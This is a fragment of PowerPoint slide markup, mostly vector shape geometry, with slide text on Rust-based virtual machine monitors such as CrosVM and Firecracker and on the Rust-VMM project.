                <a:gd name="T21" fmla="*/ 0 h 104"/>
                <a:gd name="T22" fmla="*/ 69 w 195"/>
                <a:gd name="T23" fmla="*/ 5 h 104"/>
                <a:gd name="T24" fmla="*/ 66 w 195"/>
                <a:gd name="T25" fmla="*/ 6 h 104"/>
                <a:gd name="T26" fmla="*/ 29 w 195"/>
                <a:gd name="T27" fmla="*/ 30 h 104"/>
                <a:gd name="T28" fmla="*/ 0 w 195"/>
                <a:gd name="T29" fmla="*/ 102 h 104"/>
                <a:gd name="T30" fmla="*/ 0 w 195"/>
                <a:gd name="T31" fmla="*/ 104 h 104"/>
                <a:gd name="T32" fmla="*/ 32 w 195"/>
                <a:gd name="T33" fmla="*/ 6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" h="104">
                  <a:moveTo>
                    <a:pt x="32" y="67"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="61"/>
                    <a:pt x="39" y="55"/>
                    <a:pt x="44" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="34"/>
                    <a:pt x="74" y="27"/>
                    <a:pt x="93" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="27"/>
                    <a:pt x="117" y="30"/>
                    <a:pt x="125" y="36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73" y="75"/>
                    <a:pt x="182" y="87"/>
                    <a:pt x="195" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="89"/>
                    <a:pt x="195" y="87"/>
                    <a:pt x="195" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="60"/>
                    <a:pt x="186" y="40"/>
                    <a:pt x="168" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="8"/>
                    <a:pt x="127" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="0"/>
                    <a:pt x="79" y="2"/>
                    <a:pt x="69" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="6"/>
                    <a:pt x="67" y="6"/>
                    <a:pt x="66" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="11"/>
                    <a:pt x="40" y="19"/>
                    <a:pt x="29" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="49"/>
                    <a:pt x="0" y="74"/>
                    <a:pt x="0" y="102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18" y="92"/>
                    <a:pt x="26" y="70"/>
                    <a:pt x="32" y="67"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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7571B2A-DAAF-0B4A-8663-5047DD220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67432" y="3662821"/>
              <a:ext cx="1838120" cy="1838120"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 897">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{161F228D-CEE0-1C4C-AF2E-520539D1B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42492" y="5426798"/>
              <a:ext cx="391907" cy="677436"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 50 w 53"/>
                <a:gd name="T1" fmla="*/ 10 h 94"/>
                <a:gd name="T2" fmla="*/ 52 w 53"/>
                <a:gd name="T3" fmla="*/ 0 h 94"/>
                <a:gd name="T4" fmla="*/ 9 w 53"/>
                <a:gd name="T5" fmla="*/ 5 h 94"/>
                <a:gd name="T6" fmla="*/ 0 w 53"/>
                <a:gd name="T7" fmla="*/ 4 h 94"/>
                <a:gd name="T8" fmla="*/ 1 w 53"/>
                <a:gd name="T9" fmla="*/ 13 h 94"/>
                <a:gd name="T10" fmla="*/ 8 w 53"/>
                <a:gd name="T11" fmla="*/ 61 h 94"/>
                <a:gd name="T12" fmla="*/ 2 w 53"/>
                <a:gd name="T13" fmla="*/ 86 h 94"/>
                <a:gd name="T14" fmla="*/ 24 w 53"/>
                <a:gd name="T15" fmla="*/ 93 h 94"/>
                <a:gd name="T16" fmla="*/ 53 w 53"/>
                <a:gd name="T17" fmla="*/ 86 h 94"/>
                <a:gd name="T18" fmla="*/ 44 w 53"/>
                <a:gd name="T19" fmla="*/ 68 h 94"/>
                <a:gd name="T20" fmla="*/ 50 w 53"/>
                <a:gd name="T21" fmla="*/ 1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94">
                  <a:moveTo>
                    <a:pt x="50" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="7"/>
                    <a:pt x="52" y="3"/>
                    <a:pt x="52" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="3"/>
                    <a:pt x="24" y="5"/>
                    <a:pt x="9" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="5"/>
                    <a:pt x="3" y="4"/>
                    <a:pt x="0" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="7"/>
                    <a:pt x="1" y="11"/>
                    <a:pt x="1" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="36"/>
                    <a:pt x="8" y="57"/>
                    <a:pt x="8" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="72"/>
                    <a:pt x="2" y="76"/>
                    <a:pt x="2" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="94"/>
                    <a:pt x="10" y="93"/>
                    <a:pt x="24" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="93"/>
                    <a:pt x="53" y="94"/>
                    <a:pt x="53" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="77"/>
                    <a:pt x="46" y="72"/>
                    <a:pt x="44" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="62"/>
                    <a:pt x="42" y="43"/>
                    <a:pt x="50" y="10"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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9" name="Freeform 898">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89B949B9-9509-BA41-A94C-03FAF14059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6219" y="5362281"/>
              <a:ext cx="399301" cy="741953"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 54 w 54"/>
                <a:gd name="T1" fmla="*/ 13 h 103"/>
                <a:gd name="T2" fmla="*/ 0 w 54"/>
                <a:gd name="T3" fmla="*/ 0 h 103"/>
                <a:gd name="T4" fmla="*/ 4 w 54"/>
                <a:gd name="T5" fmla="*/ 19 h 103"/>
                <a:gd name="T6" fmla="*/ 10 w 54"/>
                <a:gd name="T7" fmla="*/ 77 h 103"/>
                <a:gd name="T8" fmla="*/ 2 w 54"/>
                <a:gd name="T9" fmla="*/ 95 h 103"/>
                <a:gd name="T10" fmla="*/ 30 w 54"/>
                <a:gd name="T11" fmla="*/ 102 h 103"/>
                <a:gd name="T12" fmla="*/ 52 w 54"/>
                <a:gd name="T13" fmla="*/ 95 h 103"/>
                <a:gd name="T14" fmla="*/ 46 w 54"/>
                <a:gd name="T15" fmla="*/ 70 h 103"/>
                <a:gd name="T16" fmla="*/ 53 w 54"/>
                <a:gd name="T17" fmla="*/ 22 h 103"/>
                <a:gd name="T18" fmla="*/ 54 w 54"/>
                <a:gd name="T19" fmla="*/ 1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103">
                  <a:moveTo>
                    <a:pt x="54" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="12"/>
                    <a:pt x="16" y="7"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="7"/>
                    <a:pt x="2" y="14"/>
                    <a:pt x="4" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="52"/>
                    <a:pt x="15" y="71"/>
                    <a:pt x="10" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="81"/>
                    <a:pt x="2" y="86"/>
                    <a:pt x="2" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="103"/>
                    <a:pt x="15" y="102"/>
                    <a:pt x="30" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="102"/>
                    <a:pt x="52" y="103"/>
                    <a:pt x="52" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="85"/>
                    <a:pt x="46" y="81"/>
                    <a:pt x="46" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="66"/>
                    <a:pt x="51" y="45"/>
                    <a:pt x="53" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="19"/>
                    <a:pt x="54" y="16"/>
                    <a:pt x="54" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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0" name="Freeform 899">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39391DED-0F26-1747-B7F1-EF5CB81B9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471" y="2342164"/>
              <a:ext cx="1478893" cy="1311857"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 44 w 200"/>
                <a:gd name="T1" fmla="*/ 183 h 183"/>
                <a:gd name="T2" fmla="*/ 107 w 200"/>
                <a:gd name="T3" fmla="*/ 170 h 183"/>
                <a:gd name="T4" fmla="*/ 161 w 200"/>
                <a:gd name="T5" fmla="*/ 179 h 183"/>
                <a:gd name="T6" fmla="*/ 200 w 200"/>
                <a:gd name="T7" fmla="*/ 100 h 183"/>
                <a:gd name="T8" fmla="*/ 100 w 200"/>
                <a:gd name="T9" fmla="*/ 0 h 183"/>
                <a:gd name="T10" fmla="*/ 0 w 200"/>
                <a:gd name="T11" fmla="*/ 100 h 183"/>
                <a:gd name="T12" fmla="*/ 44 w 200"/>
                <a:gd name="T13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183">
                  <a:moveTo>
                    <a:pt x="44" y="183"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="174"/>
                    <a:pt x="84" y="170"/>
                    <a:pt x="107" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="170"/>
                    <a:pt x="144" y="173"/>
                    <a:pt x="161" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="161"/>
                    <a:pt x="200" y="132"/>
                    <a:pt x="200" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="45"/>
                    <a:pt x="155" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="0"/>
                    <a:pt x="0" y="45"/>
                    <a:pt x="0" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="135"/>
                    <a:pt x="17" y="165"/>
                    <a:pt x="44" y="183"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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1" name="Freeform 900">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F686C6-9392-D848-8A0B-68E408F67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2586" y="4095892"/>
              <a:ext cx="340145" cy="372768"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 8 w 46"/>
                <a:gd name="T1" fmla="*/ 15 h 52"/>
                <a:gd name="T2" fmla="*/ 20 w 46"/>
                <a:gd name="T3" fmla="*/ 14 h 52"/>
                <a:gd name="T4" fmla="*/ 27 w 46"/>
                <a:gd name="T5" fmla="*/ 13 h 52"/>
                <a:gd name="T6" fmla="*/ 28 w 46"/>
                <a:gd name="T7" fmla="*/ 6 h 52"/>
                <a:gd name="T8" fmla="*/ 35 w 46"/>
                <a:gd name="T9" fmla="*/ 8 h 52"/>
                <a:gd name="T10" fmla="*/ 39 w 46"/>
                <a:gd name="T11" fmla="*/ 47 h 52"/>
                <a:gd name="T12" fmla="*/ 23 w 46"/>
                <a:gd name="T13" fmla="*/ 51 h 52"/>
                <a:gd name="T14" fmla="*/ 15 w 46"/>
                <a:gd name="T15" fmla="*/ 51 h 52"/>
                <a:gd name="T16" fmla="*/ 15 w 46"/>
                <a:gd name="T17" fmla="*/ 43 h 52"/>
                <a:gd name="T18" fmla="*/ 21 w 46"/>
                <a:gd name="T19" fmla="*/ 43 h 52"/>
                <a:gd name="T20" fmla="*/ 21 w 46"/>
                <a:gd name="T21" fmla="*/ 41 h 52"/>
                <a:gd name="T22" fmla="*/ 10 w 46"/>
                <a:gd name="T23" fmla="*/ 42 h 52"/>
                <a:gd name="T24" fmla="*/ 9 w 46"/>
                <a:gd name="T25" fmla="*/ 34 h 52"/>
                <a:gd name="T26" fmla="*/ 20 w 46"/>
                <a:gd name="T27" fmla="*/ 33 h 52"/>
                <a:gd name="T28" fmla="*/ 20 w 46"/>
                <a:gd name="T29" fmla="*/ 32 h 52"/>
                <a:gd name="T30" fmla="*/ 7 w 46"/>
                <a:gd name="T31" fmla="*/ 33 h 52"/>
                <a:gd name="T32" fmla="*/ 6 w 46"/>
                <a:gd name="T33" fmla="*/ 25 h 52"/>
                <a:gd name="T34" fmla="*/ 19 w 46"/>
                <a:gd name="T35" fmla="*/ 24 h 52"/>
                <a:gd name="T36" fmla="*/ 19 w 46"/>
                <a:gd name="T37" fmla="*/ 22 h 52"/>
                <a:gd name="T38" fmla="*/ 8 w 46"/>
                <a:gd name="T39" fmla="*/ 23 h 52"/>
                <a:gd name="T40" fmla="*/ 8 w 46"/>
                <a:gd name="T41" fmla="*/ 1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52">
                  <a:moveTo>
                    <a:pt x="8" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="15"/>
                    <a:pt x="18" y="14"/>
                    <a:pt x="20" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="14"/>
                    <a:pt x="16" y="14"/>
                    <a:pt x="27" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="13"/>
                    <a:pt x="31" y="12"/>
                    <a:pt x="28" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="0"/>
                    <a:pt x="30" y="3"/>
                    <a:pt x="35" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="16"/>
                    <a:pt x="46" y="44"/>
                    <a:pt x="39" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="50"/>
                    <a:pt x="30" y="50"/>
                    <a:pt x="23" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="51"/>
                    <a:pt x="15" y="51"/>
                    <a:pt x="15" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="52"/>
                    <a:pt x="9" y="44"/>
                    <a:pt x="15" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="43"/>
                    <a:pt x="19" y="43"/>
                    <a:pt x="21" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="43"/>
                    <a:pt x="22" y="41"/>
                    <a:pt x="21" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="41"/>
                    <a:pt x="10" y="42"/>
                    <a:pt x="10" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="43"/>
                    <a:pt x="4" y="35"/>
                    <a:pt x="9" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="34"/>
                    <a:pt x="18" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="33"/>
                    <a:pt x="22" y="32"/>
                    <a:pt x="20" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="32"/>
                    <a:pt x="7" y="33"/>
                    <a:pt x="7" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="33"/>
                    <a:pt x="0" y="25"/>
                    <a:pt x="6" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="25"/>
                    <a:pt x="17" y="24"/>
                    <a:pt x="19" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="24"/>
                    <a:pt x="21" y="22"/>
                    <a:pt x="19" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="22"/>
                    <a:pt x="8" y="23"/>
                    <a:pt x="8" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="24"/>
                    <a:pt x="2" y="16"/>
                    <a:pt x="8" y="15"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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2" name="Freeform 901">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22654758-F299-864A-8A8D-F5D7687FD0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9151" y="4318119"/>
              <a:ext cx="317962" cy="365600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 33 w 43"/>
                <a:gd name="T1" fmla="*/ 12 h 51"/>
                <a:gd name="T2" fmla="*/ 20 w 43"/>
                <a:gd name="T3" fmla="*/ 13 h 51"/>
                <a:gd name="T4" fmla="*/ 14 w 43"/>
                <a:gd name="T5" fmla="*/ 14 h 51"/>
                <a:gd name="T6" fmla="*/ 12 w 43"/>
                <a:gd name="T7" fmla="*/ 6 h 51"/>
                <a:gd name="T8" fmla="*/ 6 w 43"/>
                <a:gd name="T9" fmla="*/ 10 h 51"/>
                <a:gd name="T10" fmla="*/ 8 w 43"/>
                <a:gd name="T11" fmla="*/ 49 h 51"/>
                <a:gd name="T12" fmla="*/ 24 w 43"/>
                <a:gd name="T13" fmla="*/ 50 h 51"/>
                <a:gd name="T14" fmla="*/ 31 w 43"/>
                <a:gd name="T15" fmla="*/ 49 h 51"/>
                <a:gd name="T16" fmla="*/ 31 w 43"/>
                <a:gd name="T17" fmla="*/ 41 h 51"/>
                <a:gd name="T18" fmla="*/ 24 w 43"/>
                <a:gd name="T19" fmla="*/ 42 h 51"/>
                <a:gd name="T20" fmla="*/ 24 w 43"/>
                <a:gd name="T21" fmla="*/ 40 h 51"/>
                <a:gd name="T22" fmla="*/ 35 w 43"/>
                <a:gd name="T23" fmla="*/ 39 h 51"/>
                <a:gd name="T24" fmla="*/ 34 w 43"/>
                <a:gd name="T25" fmla="*/ 31 h 51"/>
                <a:gd name="T26" fmla="*/ 24 w 43"/>
                <a:gd name="T27" fmla="*/ 32 h 51"/>
                <a:gd name="T28" fmla="*/ 23 w 43"/>
                <a:gd name="T29" fmla="*/ 31 h 51"/>
                <a:gd name="T30" fmla="*/ 37 w 43"/>
                <a:gd name="T31" fmla="*/ 30 h 51"/>
                <a:gd name="T32" fmla="*/ 36 w 43"/>
                <a:gd name="T33" fmla="*/ 22 h 51"/>
                <a:gd name="T34" fmla="*/ 23 w 43"/>
                <a:gd name="T35" fmla="*/ 23 h 51"/>
                <a:gd name="T36" fmla="*/ 23 w 43"/>
                <a:gd name="T37" fmla="*/ 21 h 51"/>
                <a:gd name="T38" fmla="*/ 34 w 43"/>
                <a:gd name="T39" fmla="*/ 20 h 51"/>
                <a:gd name="T40" fmla="*/ 33 w 43"/>
                <a:gd name="T41" fmla="*/ 1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51">
                  <a:moveTo>
                    <a:pt x="33" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="12"/>
                    <a:pt x="23" y="13"/>
                    <a:pt x="20" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="13"/>
                    <a:pt x="25" y="13"/>
                    <a:pt x="14" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="14"/>
                    <a:pt x="10" y="12"/>
                    <a:pt x="12" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="9" y="4"/>
                    <a:pt x="6" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19"/>
                    <a:pt x="0" y="46"/>
                    <a:pt x="8" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="17" y="50"/>
                    <a:pt x="24" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="50"/>
                    <a:pt x="31" y="49"/>
                    <a:pt x="31" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="49"/>
                    <a:pt x="37" y="41"/>
                    <a:pt x="31" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="41"/>
                    <a:pt x="26" y="42"/>
                    <a:pt x="24" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="42"/>
                    <a:pt x="23" y="40"/>
                    <a:pt x="24" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="40"/>
                    <a:pt x="35" y="39"/>
                    <a:pt x="35" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="39"/>
                    <a:pt x="40" y="31"/>
                    <a:pt x="34" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="31"/>
                    <a:pt x="25" y="32"/>
                    <a:pt x="24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5" y="30"/>
                    <a:pt x="37" y="30"/>
                    <a:pt x="37" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="29"/>
                    <a:pt x="42" y="21"/>
                    <a:pt x="36" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="22"/>
                    <a:pt x="25" y="22"/>
                    <a:pt x="23" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="23"/>
                    <a:pt x="21" y="21"/>
                    <a:pt x="23" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="21"/>
                    <a:pt x="34" y="20"/>
                    <a:pt x="34" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="20"/>
                    <a:pt x="39" y="12"/>
                    <a:pt x="33" y="12"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="BDC3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5" tIns="22857" rIns="45715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3" name="Овал 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0FF7F94-6658-3447-A491-9389AAF39746}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="8976055" y="2320289"/>
              <a:ext cx="1366463" cy="1130042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2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27418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E6D7F8-CB46-A147-A297-14D969A4403A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102975" y="1659285"/>
            <a:ext cx="9103705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Written in Rust: Memory-safe language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Secure: Minimal hardware emulation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Flexible: Easy to customize to fit various network, storage and OS environments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High-performance: Leverage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>KVM capability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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CDCA424-7230-A24F-B44D-989FA19DF8FD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Advantage</a:t>
            </a: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Rust-VMM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3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B10BD4-8E79-5E4F-86BB-5A45B9A01562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="740228" y="1869665"/>
            <a:ext cx="992777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Google implements the first Rust-based light VMM called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Cr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> which is in Fuchsia operating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/>
              <a:t>AWS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> develops his own light VMM called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>irecracker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> which is based of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>ros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>VM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/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>here are lots of reduplication in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>ros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> and Firecracker, to get avoid this, these companies setup a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>ust-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>VMM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> project</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" sz="3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431FCBA-74DE-8542-A73D-F8EF896B37E1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Rust-VMM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196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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256FA38D-84E6-1F4D-BE7D-A44514CCBD80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Rust-VMM</a:t>
            </a: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32A00B-F432-DA45-933D-61FDCCE9D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74" y="1108711"/>
            <a:ext cx="11604851" cy="61302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60F43DF-4BCB-A143-BED4-008144FE0BB0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="-406190" y="6094044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60F43DF-4BCB-A143-BED4-008144FE0BB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414830" y="6085404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8547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29856A-75D6-4945-9A19-D9B0927A1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574" y="3195653"/>
